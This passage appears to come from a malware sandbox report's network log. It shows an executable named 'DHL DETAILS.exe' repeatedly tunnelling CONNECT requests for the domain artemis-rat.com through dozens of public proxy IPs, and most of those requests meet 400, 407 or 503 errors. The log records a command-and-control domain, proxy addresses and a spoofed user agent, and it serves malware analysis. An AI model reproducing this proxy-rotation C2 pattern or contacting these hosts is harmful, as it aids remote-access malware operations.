Mar 9, 2024 13:14:23.833204985 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:27.739975929 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.646334887 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.646372080 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1653	192.168.2.5	54992	94.130.94.45	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.149169922 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1654	192.168.2.5	54998	185.212.60.62	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.149171114 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.500693083 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:20 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1655	192.168.2.5	55030	172.93.213.177	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.149379969 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.355993032 CET	309	IN	HTTP/1.1 400 Bad Request Server: nginx/1.22.1 Date: Sat, 09 Mar 2024 12:14:20 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1656	192.168.2.5	54965	103.242.119.88	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.152000904 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.560369015 CET	629	IN	HTTP/1.1 407 Proxy Authentication Required Date: Sat, 09 Mar 2024 12:14:20 GMT Server: Apache Proxy-Authenticate: Basic realm="Authorization" Content-Length: 415 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 37 20 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 76 65 72 69 66 79 20 74 68 61 74 20 79 6f 75 0a 61 72 65 20 61 75 74 68 6f 72 69 7a 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 0a 72 65 71 75 65 73 74 65 64 2e 20 20 45 69 74 68 65 72 20 79 6f 75 20 73 75 70 70 6c 69 65 64 20 74 68 65 20 77 72 6f 6e 67 0a 63 72 65 64 65 6e 74 69 61 6c 73 20 28 65 2e 67 2e 2c 20 62 61 64 20 70 61 73 73 77 6f 72 64 29 2c 20 6f 72 20 79 6f 75 72 0a 62 72 6f 77 73 65 72 20 64 6f 65 73 6e 27 74 20 75 6e 64 65 72 73 74 61 6e 64 20 68 6f 77 20 74 6f 20 73 75 70 70 6c 79 0a 74 68 65 20 63 72 65 64 65 6e 74 69 61 6c 73 20 72 65 71 75 69 72 65 64 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>407 Proxy Authentication Required</title></head><body><h1>Proxy Authentication Required</h1><p>This server could not verify that youare authorized to access the documentrequested. Either you supplied the wrongcredentials (e.g., bad password), or yourbrowser doesn't understand how to supplythe credentials required.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1657	192.168.2.5	55078	172.67.181.103	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.161992073 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.316072941 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:20 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1658	192.168.2.5	55076	104.18.44.93	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.162440062 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.316595078 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:20 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1659	192.168.2.5	54367	39.99.144.43	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.169404984 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1660	192.168.2.5	50606	213.136.78.200	19925	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.177582026 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1661	192.168.2.5	55015	64.137.93.62	6519	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.191354990 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.559606075 CET	459	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization." Proxy-Connection: close X-Webshare-Error: 407 X-Webshare-Reason: invalidpassword Date: Sat, 09 Mar 2024 12:14:20 GMT Content-Length: 121 Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1662	192.168.2.5	54995	8.219.179.237	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.197237015 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1663	192.168.2.5	54971	103.109.59.209	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.197597980 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1664	192.168.2.5	54999	65.109.152.88	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.198738098 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:24.719253063 CET	270	IN	HTTP/1.1 503 Service Unavailable Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Sat, 09 Mar 2024 12:14:24 GMT Content-Length: 102 Data Raw: 64 69 61 6c 20 74 63 70 3a 20 6c 6f 6f 6b 75 70 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 6f 6e 20 31 2e 31 2e 31 2e 31 3a 35 33 3a 20 72 65 61 64 20 75 64 70 20 31 30 2e 36 34 2e 32 33 38 2e 32 31 36 3a 34 37 30 30 36 2d 3e 31 2e 31 2e 31 2e 31 3a 35 33 3a 20 69 2f 6f 20 74 69 6d 65 6f 75 74 0a Data Ascii: dial tcp: lookup artemis-rat.com on 1.1.1.1:53: read udp 10.64.238.216:47006->1.1.1.1:53: i/o timeout

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1665	192.168.2.5	54994	202.150.1.87	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.205468893 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1666	192.168.2.5	55055	45.196.151.59	5432	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.220046043 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.441876888 CET	308	IN	HTTP/1.1 407 Proxy Authentication Required Server: FaaS v1.3-20220203-7fa38bd5af Date: Sat, 09 Mar 2024 12:14:20 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 65 Proxy-Authenticate: Basic realm="Proxy" Connection: close Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64 Data Ascii: HTTP authorization error: ip auth failed, no credentials provided

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1667	192.168.2.5	55064	24.199.86.181	8000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.230654955 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1668	192.168.2.5	55117	104.16.72.45	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.232134104 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.386037111 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:20 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1669	192.168.2.5	54993	103.231.78.36	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.234841108 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1670	192.168.2.5	55170	172.67.150.173	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.330647945 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.500308037 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:20 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1671	192.168.2.5	55194	172.67.182.126	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.331340075 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.500499964 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:20 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1672	192.168.2.5	54022	199.229.254.129	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.331425905 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1673	192.168.2.5	55008	181.209.78.78	999	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.332690001 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.177074909 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1674	192.168.2.5	55209	104.21.64.208	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.333300114 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.500801086 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:20 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1675	192.168.2.5	55210	104.27.83.183	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.333322048 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.501017094 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:20 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1676	192.168.2.5	55080	114.156.77.107	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.333472013 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1677	192.168.2.5	55029	138.36.150.15	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
